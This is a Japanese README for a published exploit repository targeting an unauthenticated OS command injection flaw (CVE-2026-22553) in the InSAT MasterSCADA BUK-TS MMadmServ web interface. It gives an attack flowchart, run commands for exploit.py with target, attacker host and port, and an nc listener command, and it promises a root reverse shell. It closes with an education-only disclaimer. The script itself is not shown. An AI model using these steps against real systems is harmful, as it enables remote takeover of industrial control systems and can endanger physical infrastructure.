
認証不要のOSコマンドインジェクションエクスプロイト for InSAT MasterSCADA BUK-TS MMadmServ Webインターフェース。HTTP POSTリクエストを介してルート権限でリバースシェルを送信します。CVSS 9.8 クリティカル。
CVE-2026-22553 | CVSS 9.8 重大| エクスプロイト作成者 Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS にはMMadmServ Webインターフェースに認証不要のOSコマンドインジェクションの脆弱性があります。この欠陥により、リモート攻撃者は認証なしで完全なリモートコード実行(RCE)を達成できます。
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fff
python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| オプション | 説明 |
|---|---|
target | ターゲットURL (例: http://ip:port) |
--lhost | あなたのIPアドレス (リバースシェル) |
--lport | あなたのリスニングポート |
自分のマシンでリスナーを起動します:
nc -lvnp 4444
エクスプロイトを実行します:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
root/system権限でリバースシェルを取得します。
このエクスプロイトは教育目的および許可されたペネトレーションテストのためにのみ提供されます。
自分が所有していないシステムに対する不正使用は違法であり、国際法に違反する可能性があります。
作成者は誤使用に対する一切の責任を負いません。
Mohammed Idrees Banyamer
このリポジトリが役に立ったら⭐を付けてください!